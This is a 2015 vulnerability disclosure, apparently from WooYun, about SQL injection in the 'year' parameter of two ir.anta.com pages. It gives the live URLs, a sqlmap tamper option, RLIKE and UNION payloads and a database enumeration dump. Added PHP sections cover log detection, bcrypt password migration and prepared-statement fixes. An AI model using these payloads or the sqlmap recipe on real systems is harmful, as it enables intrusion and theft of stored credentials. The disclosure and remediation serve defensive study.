2015-06-16: Details reported to the vendor, awaiting vendor handling. 2015-06-21: The vendor actively ignored the vulnerability; details disclosed to the public.
As per the title.
The SQL injection reaches a large number of databases, user passwords in one table are stored in plaintext, and there are in fact two injection points. Injection point 1:
http://ir.anta.com/sc/home.php?id=4&Itemid=3&option=3&year=*
The year parameter is injectable. Injection point 2:
http://ir.anta.com/tc/home.php?id=4&Itemid=3&option=3&year=*
WooYun: Anta SQL injection vulnerability affecting multiple sites
This injection point was confirmed by the vendor more than a year ago and still has not been fixed??? Did they forget? When running sqlmap, note that you need to add the option --tamper=space2morehash.py
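The tamper script named above rewrites the spaces in each payload as URL-encoded MySQL comment-plus-newline sequences (%23...%0A), and the sqlmap output below records the exact RLIKE and UNION statement shapes that were sent. Those shapes are what a defender can alert on. The PHP below is an added example and not part of this report: it parses Apache access-log lines (constructed here to mirror the requests in the output; the host in the output runs Apache 2.2.3) and flags the ones carrying those signatures. The signature names and the sample IP address are made up for the example.

```php
<?php
// Added example, not part of the report. Scans Apache combined/common log
// lines for the request shapes seen in the sqlmap output: boolean-blind
// RLIKE probes, UNION ... SELECT NULL column probes, and the "#comment\n"
// space substitution produced by the space2morehash tamper.

function injectionSignatures()
{
    // Patterns are applied to the URL-decoded request target, so "\s" also
    // covers the newlines that the tamper hides inside %0A sequences.
    return array(
        'rlike_boolean_blind' => '/RLIKE\s*\(\s*SELECT/i',
        'union_select_null'   => '/UNION(?:\s|#[^\n]*\n)+ALL(?:\s|#[^\n]*\n)+SELECT/i',
        'space2morehash'      => '/#[0-9A-Za-z]*\n/', // a newline inside a query string
    );
}

// Returns one entry per suspicious line: line number, client IP, status,
// request path (without query string) and the list of matched signatures.
function scanAccessLog(array $lines)
{
    $sigs = injectionSignatures();
    $hits = array();
    foreach ($lines as $index => $line) {
        // ip ident user [time] "METHOD target PROTO" status ...
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue; // not a request line; skip quietly
        }
        $target  = $m[4];
        // Decode twice so a double-encoded payload is seen in the clear.
        $decoded = urldecode(urldecode($target));
        $matched = array();
        foreach ($sigs as $name => $regex) {
            if (preg_match($regex, $decoded)) {
                $matched[] = $name;
            }
        }
        if ($matched) {
            $path   = strstr($target, '?', true);
            $hits[] = array(
                'line'       => $index + 1,
                'ip'         => $m[1],
                'time'       => $m[2],
                'status'     => (int) $m[5],
                'path'       => $path === false ? $target : $path,
                'signatures' => $matched,
            );
        }
    }
    return $hits;
}

// Constructed sample: one benign request, one RLIKE probe, one UNION probe
// with space2morehash encoding. 203.0.113.0/24 is a documentation range.
$sampleLog = array(
    '203.0.113.7 - - [16/Jun/2015:10:00:01 +0800] "GET /sc/home.php?id=4&Itemid=3&option=3&year=2014 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Jun/2015:10:00:02 +0800] "GET /sc/home.php?id=4&Itemid=3&option=3&year=%27%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8257%3D8257)%20THEN%20%27%27%20ELSE%200x28%20END))%20AND%20%27gKeW%27%3D%27gKeW HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Jun/2015:10:00:03 +0800] "GET /sc/home.php?id=4&Itemid=3&option=3&year=%27%23x9Qw%0AUNION%23bH2%0AALL%23kL7%0ASELECT%23pQ1%0ANULL,NULL-- HTTP/1.1" 500 312',
);

foreach (scanAccessLog($sampleLog) as $hit) {
    printf("line %d  %s  %s  status %d  %s\n",
        $hit['line'], $hit['ip'], $hit['path'], $hit['status'], implode(',', $hit['signatures']));
}
```

The scanner reports lines 2 and 3 of the sample and stays silent on line 1. A 200 on a probe is the more worrying case, because it means the page rendered with the injected expression in place; a burst of such requests from one client within seconds is what the 331-request sqlmap run at the top of the output would look like in a real log.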
sqlmap identified the following injection points with a total of 331 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW
    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

    Type: UNION query
    Title: Generic UNION query (NULL) - 22 columns
    Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
    Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.4.40
back-end DBMS: MySQL >= 5.0.0
current user: 'tomocms2@%'
current database: 'tomocms2'
current user is DBA: True
available databases [54]:
[*] aastocks_db
[*] bboard
[*] bboard2
[*] bboard2_20101231
[*] chinastarch1
[*] cks
[*] cks_new
[*] community
[*] community_20101231
[*] doubleindex
[*] ginsengnatural
[*] glkg
[*] hds
[*] hds_2009
[*] information_schema
[*] jiuhao
[*] kotocms003
[*] kotoportal003
[*] l_xingyecopper
[*] maryhelp
[*] maryhelp_20140709
[*] mh
[*] midea
[*] mysql
[*] mysql_old
[*] new-ray
[*] newworld
[*] newworld_20131210
[*] newworld_demo
[*] ntop
[*] onlinereport
[*] performance_schema
[*] report
[*] samkadm_cms
[*] smart_xtep
[*] smart_xtep_20100106
[*] snowkiss
[*] tdn
[*] test
[*] tomocms
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_export
[*] tomocms2_my
[*] tomocms2_restore
[*] tomocms2_sg
[*] tomocms2_temp
[*] tomocms2_tw
[*] tomocms2copy
[*] view_db
[*] web2project
[*] wordpress
[*] xinhuapinmei

Database: tomocms2
[218 tables]
+-----------------------------------+
| language |
| showcases_record_history.20140823 |
| tomocms2_center.cms_content_press |
| alert_form |
| client_index |
| client_info |
| client_infoen |
| client_infosc |
| client_infotc |
| cms_alert |
| cms_content |
| cms_content_115 |
| cms_content_3 |
| cms_content_312 |
| cms_content_313 |
| cms_content_314 |
| cms_content_38 |
| cms_content_3_38 |
| cms_content_3_4_38 |
| cms_content_4 |
| cms_content_5 |
| cms_content_7 |
| cms_content_76 |
| cms_content_7_76 |
| cms_content_delete |
| cms_content_highlight |
| cms_content_jrj |
| cms_content_scio |
| cms_header |
| cms_header_client |
| cms_index |
| cms_index_client |
| cms_info |
| cms_info_client |
| cmsgroup_info |
| cmsgroup_info_client |
| company_details_1_en |
| company_details_1_tc |
| company_details_2_en |
| company_details_2_tc |
| email_alert |
| email_template |
| enquiry_form |
| exchange_code |
| feedback_app |
| fileview |
| ftp_accounts |
| ftp_accounts_20140207 |
| function1 |
| function10 |
| function10_css |
| function10_list |
| function10_list_default |
| function11 |
| function12 |
| function13 |
| function13_area06 |
| function14 |
| function15 |
| function16 |
| function2 |
| function3 |
| function4 |
| function5 |
| function6 |
| function7 |
| function8 |
| function9 |
| hkex_alert_counter |
| hkex_alert_headline |
| hkex_alert_queue |
| hkex_alert_record |
| hkex_alert_record_new |
| hkex_alert_record_new_problem |
| hkex_alert_record_problem |
| hkex_alert_record_testing |
| hkex_scan |
| httpd_accounts |
| industry_code |
| item |
| mod03_records |
| mod03_records_app |
| mod1 |
| mod10_info |
| mod11_info |
| mod11_info_backup |
| mod12_info |
| mod12_info_backup |
| mod14_info |
| mod15_caption_info |
| mod15_caption_info_backup |
| mod15_info_0 |
| mod15_info_0_20131120 |
| mod15_info_0_backup |
| mod15_info_1 |
| mod15_info_1_backup |
| mod15_info_2 |
| mod15_info_2_backup |
| mod15_label_info |
| mod15_label_info_backup |
| mod15_ppt_info |
| mod15_ppt_info_backup |
| mod17_info |
| mod18_history |
| mod18_info_old |
| mod18_schedule_old |
| mod18_smallchart |
| mod18_temp |
| mod19_info |
| mod1_csv_record |
| mod1_email_record |
| mod1_info |
| mod21_content |
| mod21_csv_record |
| mod21_email_record |
| mod21_info |
| mod22_content |
| mod22_content_backup |
| mod22_csv_record |
| mod22_email_record |
| mod22_info |
| mod23_email |
| mod23_info |
| mod23_live |
| mod23_log |
| mod23_pass |
| mod23_qa |
| mod23_record |
| mod23_reminder |
| mod24_color |
| mod24_info |
| mod25_content |
| mod25_info |
| mod26_content |
| mod26_info |
| mod28_color |
| mod28_info |
| mod28_pm |
| mod29_info |
| mod2_info |
| mod30_color |
| mod30_info |
| mod31_info |
| mod32_info |
| mod32_pm |
| mod33_setting |
| mod6_holiday |
| mod6_info |
| mod8_info |
| mod9_delete |
| mod9_field |
| mod9_info |
| mod9_info_20130128 |
| mod9_info_20130311 |
| mod9_info_20130428 |
| mod9_info_backup |
| mod9_info_category |
| mod9_info_client |
| mod9_info_country |
| mod9_info_country_change |
| mod9_info_email |
| mod9_info_migrate |
| mod9_info_new |
| mod9_info_new_20140227 |
| mod9_info_new_20140228 |
| mod9_info_new_toni |
| mod9_info_press8 |
| mod9_info_press9 |
| mod9_info_problem |
| mod9_info_setting |
| mod9_info_title |
| mod9_info_title_change |
| mod9_setting |
| mod_index |
| modright_info |
| news01 |
| news02 |
| news_final |
| news_records |
| news_source |
| pageview |
| pageview2 |
| pageview2_last |
| pageview3 |
| pageview3_last |
| pageview4 |
| pageview4_session |
| pageview_last |
| photo_log |
| photo_login |
| promotion_content |
| promotion_index |
| request_content |
| request_content_complete |
| request_content_new |
| request_email |
| request_header |
| request_index |
| request_status |
| resize_pic |
| showcases_record |
| showcases_record_history |
| smic_contact_form |
| survey_content |
| survey_header |
| todayir_industry_code |
| type_code |
| type_code_china |
| user_index |
| user_info |
| user_log |
| userright_info |
| video_auth |
| video_chat |
| video_log |
| voting_result |
| voting_result_new |
| wpip |
+-----------------------------------+

Database: tomocms2
Table: user_info
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| admin    | varchar(1)   |
| clientid | int(5)       |
| email    | varchar(100) |
| item     | int(3)       |
| lang     | varchar(2)   |
| login    | varchar(40)  |
| password | varchar(32)  |
| status   | varchar(1)   |
| userid   | int(5)       |
+----------+--------------+
Passwords are stored in plaintext, and a large number of them are weak.
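The user_info listing above shows a varchar(32) password column holding plaintext. As an added example that is not the site's own code, the PHP below replaces that with per-user salted bcrypt hashes via password_hash()/password_verify() and converts each legacy plaintext row on that user's next successful login, so the whole table can be migrated without a reset campaign. It assumes a PDO handle and the login and password columns as listed (the password column must first be widened to at least 60 characters for bcrypt output), and adds a minimal length rule against the weak passwords the report mentions. password_hash() exists from PHP 5.5; a host still on PHP 5.4 like the one in the sqlmap output would need the password_compat polyfill, which provides the same functions.

```php
<?php
// Added example, not code from the report or the vendor. Assumes a PDO
// connection and a table user_info(login, password) whose `password`
// column has been widened (ALTER TABLE) to hold a 60-character bcrypt hash.
// password_hash()/password_verify() exist from PHP 5.5; on PHP 5.4 the
// password_compat polyfill provides identical functions.

// Minimal policy against the trivially weak passwords the report describes.
function passwordAcceptable($login, $plain)
{
    if (strlen($plain) < 10) {
        return false;
    }
    if (strcasecmp($plain, $login) === 0) {
        return false;
    }
    return true;
}

function writeHash(PDO $pdo, $login, $hash)
{
    $stmt = $pdo->prepare('UPDATE user_info SET password = :hash WHERE login = :login');
    $stmt->execute(array(':hash' => $hash, ':login' => $login));
}

// Hash a new or changed password: bcrypt with a random per-password salt.
// Cost 12 keeps a verification in the tens of milliseconds on 2015-era hardware.
function storePassword(PDO $pdo, $login, $plain)
{
    if (!passwordAcceptable($login, $plain)) {
        throw new InvalidArgumentException('password does not meet policy');
    }
    writeHash($pdo, $login, password_hash($plain, PASSWORD_BCRYPT, array('cost' => 12)));
}

// Returns true only for a correct password. A legacy plaintext row is
// compared once and immediately replaced by a hash, so plaintext leaves the
// table as users log in; the caller should then force a change if the old
// value fails passwordAcceptable().
function checkLogin(PDO $pdo, $login, $plain)
{
    $stmt = $pdo->prepare('SELECT password FROM user_info WHERE login = :login');
    $stmt->execute(array(':login' => $login));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;
    }
    $stored = $row['password'];

    $info = password_get_info($stored);
    if (empty($info['algo'])) {
        // Not produced by password_hash(): treat as a legacy plaintext value.
        if ($stored !== $plain) {
            return false;
        }
        writeHash($pdo, $login, password_hash($plain, PASSWORD_BCRYPT, array('cost' => 12)));
        return true;
    }

    if (!password_verify($plain, $stored)) {
        return false;
    }
    // Re-hash transparently if the cost or algorithm has since been raised.
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, array('cost' => 12))) {
        writeHash($pdo, $login, password_hash($plain, PASSWORD_BCRYPT, array('cost' => 12)));
    }
    return true;
}

// Usage (DSN and credentials are placeholders):
// $pdo = new PDO('mysql:host=127.0.0.1;dbname=tomocms2;charset=utf8', 'ir_web', '<secret>');
// $ok  = checkLogin($pdo, $_POST['login'], $_POST['password']);
```

With this in place a dump of user_info through the injection above yields bcrypt strings rather than reusable credentials, and the cost factor makes offline guessing of the weak passwords the report notes far slower than a plaintext or unsalted MD5 column would.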
Filter and validate the parameter.
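Concretely, for the year parameter that sqlmap exploited, filtering means two things: reject anything that is not shaped like a year before it reaches the query, and hand the value to MySQL as a bound parameter rather than splicing it into the SQL string. The PHP below is an added example and not the site's code; it assumes a PDO handle and a hypothetical cms_content table with id, title and year columns, and shows the vulnerable concatenation beside the fixed version. The sqlmap output also shows the web application's database account is a DBA with 54 databases visible, so the fix should include a dedicated MySQL user restricted to the tomocms2 schema and to the statements the site actually needs; the account name in the usage comment is a placeholder.

```php
<?php
// Added example, not the site's own code. Assumes a PDO connection and a
// hypothetical table cms_content(id, title, year).

// BEFORE: the raw query-string value is spliced into the SQL text, so a value
// that starts with a quote changes the statement itself. This is the shape
// that lets both the boolean-blind and the UNION payloads in the report work.
function listByYearVulnerable(PDO $pdo, $year)
{
    $sql = "SELECT id, title FROM cms_content WHERE year = '" . $year . "' ORDER BY id";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// AFTER, step 1: allowlist the shape. Returns an int or null. The is_string
// check also rejects year[]=... array tricks from the query string.
function validateYear($value)
{
    if (!is_string($value) || !preg_match('/^\d{4}$/', $value)) {
        return null;
    }
    $year = (int) $value;
    return ($year >= 1990 && $year <= 2100) ? $year : null;
}

// AFTER, step 2: bind the value as data. A bound parameter is never parsed
// as SQL, so even a value that slipped past validation cannot alter the query.
function listByYear(PDO $pdo, $rawYear)
{
    $year = validateYear($rawYear);
    if ($year === null) {
        return null; // caller answers 400 Bad Request
    }
    $stmt = $pdo->prepare('SELECT id, title FROM cms_content WHERE year = :year ORDER BY id');
    $stmt->bindValue(':year', $year, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection setup matters too: native server-side prepares, exceptions on
// error (so failures go to the log instead of leaking through page content),
// and a least-privilege account instead of the DBA account seen in the report.
function connect($dsn, $user, $password)
{
    return new PDO($dsn, $user, $password, array(
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ));
}

// Usage (DSN, account name and secret are placeholders):
// $pdo  = connect('mysql:host=127.0.0.1;dbname=tomocms2;charset=utf8', 'ir_web', '<secret>');
// $rows = listByYear($pdo, isset($_GET['year']) ? $_GET['year'] : '');
// if ($rows === null) { http_response_code(400); exit; }
```

Validation and binding are independent defences: the allowlist stops the request early and gives a clean 400 to log on, while the prepared statement protects the query even when a future code path forgets to validate.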
Severity: No impact (vendor ignored)
Ignored at: 2015-06-21 16:54
Vulnerability Rank: 4 (WooYun rating)
None yet